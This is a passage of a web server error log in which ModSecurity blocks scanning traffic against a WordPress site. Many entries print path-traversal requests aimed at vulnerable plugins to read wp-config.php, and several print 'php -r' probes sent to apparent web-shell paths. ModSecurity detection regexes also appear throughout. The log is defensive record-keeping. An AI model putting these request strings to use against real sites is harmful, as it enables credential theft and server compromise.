"/wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php"] [unique_id "ZAuBZHuziPICRqZEvCRx6gAAAMU"], referer: https://www.google.com/search? [Fri Mar 10 14:13:44.624446 2023] [:error] [pid 26869:tid 140211480651520] [client 20.169.196.237:37148] [client 20.169.196.237] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/post-pdf-export/dompdf/dompdf.php?input_file=../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/post-pdf-export/dompdf/dompdf.php"] [unique_id "ZAuBaHuziPICRqZEvCRx7wAAAMs"], referer: https://www.google.com/search? [Fri Mar 10 14:16:29.936870 2023] [:error] [pid 26438:tid 140211388331776] [client 20.169.196.237:37788] [client 20.169.196.237] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/usc-e-shop/functions/content-log.php?logfile=./../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/usc-e-shop/functions/content-log.php"] [unique_id "ZAuCDQEptxjQbT0BbxFF3AAAAJY"], referer: https://www.google.com/search? [Fri Mar 10 14:46:01.864524 2023] [:error] [pid 26869:tid 140211455473408] [client 185.217.117.43:43960] [client 185.217.117.43] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\A|[^\\\\d])0x[a-f\\\\d]{3,}[a-f\\\\d]*)+" at REQUEST_COOKIES:tk_ai. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "55"] [id "981260"] [rev "2"] [msg "SQL Hex Encoding Identified"] [data "Matched Data: c0XeA8 found within REQUEST_COOKIES:tk_ai: jetpack:Zc0XeA8ZqKq6YEYcu3EF4xZt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZAuI-XuziPICRqZEvCR2jAAAAM4"] [Fri Mar 10 16:18:15.585966 2023] [autoindex:error] [pid 26438:tid 140211645355776] [client 20.7.133.62:47772] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Fri Mar 10 17:04:07.608311 2023] [:error] [pid 26438:tid 140211396724480] [client 51.68.11.215:49496] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php, referer: http://simplesite.com [Fri Mar 10 17:58:48.414485 2023] [autoindex:error] [pid 26438:tid 140211539400448] [client 20.14.161.248:51942] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Fri Mar 10 18:48:34.461949 2023] [:error] [pid 26438:tid 140211430295296] [client 213.171.202.4:54126] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php, referer: http://simplesite.com [Fri Mar 10 18:48:39.403579 2023] [:error] [pid 26869:tid 140211547793152] [client 213.171.202.4:54130] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php, referer: http://simplesite.com [Fri Mar 10 20:37:11.234800 2023] [autoindex:error] [pid 26437:tid 140211539400448] [client 20.168.54.224:58104] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Fri Mar 10 21:11:46.467570 2023] [:error] [pid 26869:tid 140211371546368] [client 152.89.196.13:59344] [client 152.89.196.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:command. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:command: php -r 'die(pi()*42);'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wordpresss3cll-2/about.php"] [unique_id "ZAvjYnuziPICRqZEvCSAuwAAANg"] [Fri Mar 10 21:54:27.307684 2023] [:error] [pid 26437:tid 140211396724480] [client 152.89.196.13:32846] [client 152.89.196.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:command. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:command: php -r 'die(pi()*42);'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wordpresss3cll-1/about.php"] [unique_id "ZAvtY2Aq8NyKMXpwM5H0FgAAAFU"] [Fri Mar 10 21:58:13.272993 2023] [:error] [pid 26437:tid 140211455473408] [client 152.89.196.13:33016] [client 152.89.196.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:command. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:command: php -r 'die(pi()*42);'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wordpresss3cll/about.php"] [unique_id "ZAvuRWAq8NyKMXpwM5H0HQAAAE4"] [Fri Mar 10 22:11:30.447364 2023] [:error] [pid 26869:tid 140211497436928] [client 152.89.196.13:33490] [client 152.89.196.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:command. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:command: php -r 'die(pi()*42);'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wordpresss3cll-3/about.php"] [unique_id "ZAvxYnuziPICRqZEvCSCOAAAAMk"] [Fri Mar 10 22:35:43.898643 2023] [:error] [pid 26437:tid 140211379939072] [client 152.89.196.13:34308] [client 152.89.196.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:p1. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:p1: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/wp-config-example.php"] [unique_id "ZAv3D2Aq8NyKMXpwM5H0aAAAAFc"] [Fri Mar 10 22:35:50.898343 2023] [:error] [pid 26435:tid 140211645355776] [client 152.89.196.13:34310] [client 152.89.196.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:command. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:command: php -r 'die(pi()*42);'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/zyaonqzzll/about.php"] [unique_id "ZAv3Fmme6ZBH7SppF5Ep7wAAAAA"] [Fri Mar 10 22:54:29.672163 2023] [:error] [pid 26869:tid 140211522615040] [client 152.89.196.13:34924] [client 152.89.196.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:2. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:2: php -r 'die(pi()*42);'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/seoplugins/mar.php"] [unique_id "ZAv7dXuziPICRqZEvCSDRwAAAMY"] [Fri Mar 10 23:13:30.488598 2023] [:error] [pid 26869:tid 140211413509888] [client 152.89.196.13:35496] [client 152.89.196.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:command. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:command: php -r 'die(pi()*42);'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wordpresss3cll-4/about.php"] [unique_id "ZAv_6nuziPICRqZEvCSDpwAAANM"] [Fri Mar 10 23:24:54.098895 2023] [:error] [pid 26869:tid 140211438688000] [client 152.89.196.13:35874] [client 152.89.196.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:command. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:command: php -r 'die(pi()*42);'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wordpresssh3ll/about.php"] [unique_id "ZAwClnuziPICRqZEvCSD7gAAANA"] [Sat Mar 11 03:24:21.222397 2023] [ssl:warn] [pid 4418:tid 140668867282816] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Mar 11 03:24:21.342170 2023] [ssl:warn] [pid 4419:tid 140668867282816] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Mar 11 03:24:21.569896 2023] [ssl:warn] [pid 4419:tid 140668867282816] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Mar 11 03:24:23.363757 2023] [ssl:warn] [pid 4419:tid 140668867282816] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Mar 11 03:24:25.555793 2023] [ssl:warn] [pid 4929:tid 140122916386688] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Mar 11 03:24:25.666256 2023] [ssl:warn] [pid 4930:tid 140122916386688] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name 2023/03/11 12:49:37 [error] 4826#4826: *101208 access forbidden by rule, client: 152.32.157.204, server: mail.investigacionperu.com, request: "GET /.git/index HTTP/1.1", host: "mail.investigacionperu.com" [Sat Mar 11 15:00:20.619935 2023] [:error] [pid 5535:tid 140122527835904] [client 5.188.62.76:43264] [client 5.188.62.76] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZAzd1ISy55qonxNpBvAzFwAAANA"] [Sat Mar 11 17:17:35.596365 2023] [:error] [pid 4949:tid 140122578192128] [client 5.188.62.26:48800] [client 5.188.62.26] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZAz9_3DwSyJIsXDy8eyA2wAAAIo"] [Sat Mar 11 21:32:28.544544 2023] [:error] [pid 5535:tid 140122636941056] [client 5.188.62.174:58308] [client 5.188.62.174] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZA05vISy55qonxNpBvA8-wAAAMM"] [Sun Mar 12 03:27:28.084447 2023] [ssl:warn] [pid 7795:tid 140716327962496] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Mar 12 03:27:28.214756 2023] [ssl:warn] [pid 7797:tid 140716327962496] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Mar 12 03:27:28.701229 2023] [ssl:warn] [pid 7797:tid 140716327962496] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Mar 12 03:27:30.444283 2023] [ssl:warn] [pid 7797:tid 140716327962496] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Mar 12 03:27:32.858912 2023] [ssl:warn] [pid 8272:tid 140582001411968] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Mar 12 03:27:32.966598 2023] [ssl:warn] [pid 8273:tid 140582001411968] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Mar 12 07:52:00.256461 2023] [:error] [pid 8441:tid 140581720286976] [client 34.28.132.143:56824] [client 34.28.132.143] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php"] [unique_id "ZA3K8HpKQvzaPITyJaClIQAAAMM"], referer: https://www.google.com/search? [Sun Mar 12 07:52:06.217899 2023] [:error] [pid 8295:tid 140581669930752] [client 34.28.132.143:56828] [client 34.28.132.143] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-admin/admin-ajax.php?action=handle_downloads&alg_wc_pif_download_file=../../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZA3K9lCb4iSZOjEP_iOhiAAAAIk"], referer: https://www.google.com/search? [Sun Mar 12 07:52:17.896675 2023] [:error] [pid 8294:tid 140581594396416] [client 34.28.132.143:56842] [client 34.28.132.143] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php"] [unique_id "ZA3LARteXb8EaiOaraodsQAAAFI"], referer: https://www.google.com/search? [Sun Mar 12 07:52:25.761178 2023] [:error] [pid 8441:tid 140581695108864] [client 34.28.132.143:56850] [client 34.28.132.143] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php?input_file=../../../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php"] [unique_id "ZA3LCXpKQvzaPITyJaClKAAAAMY"], referer: https://www.google.com/search? [Sun Mar 12 07:52:30.454331 2023] [:error] [pid 8295:tid 140581544040192] [client 34.28.132.143:56852] [client 34.28.132.143] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/post-pdf-export/dompdf/dompdf.php?input_file=../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/post-pdf-export/dompdf/dompdf.php"] [unique_id "ZA3LDlCb4iSZOjEP_iOhiwAAAJg"], referer: https://www.google.com/search? [Sun Mar 12 07:56:47.247407 2023] [:error] [pid 8441:tid 140581594396416] [client 34.28.132.143:57120] [client 34.28.132.143] ModSecurity: Access denied with code 403 (phase 2). Pattern match 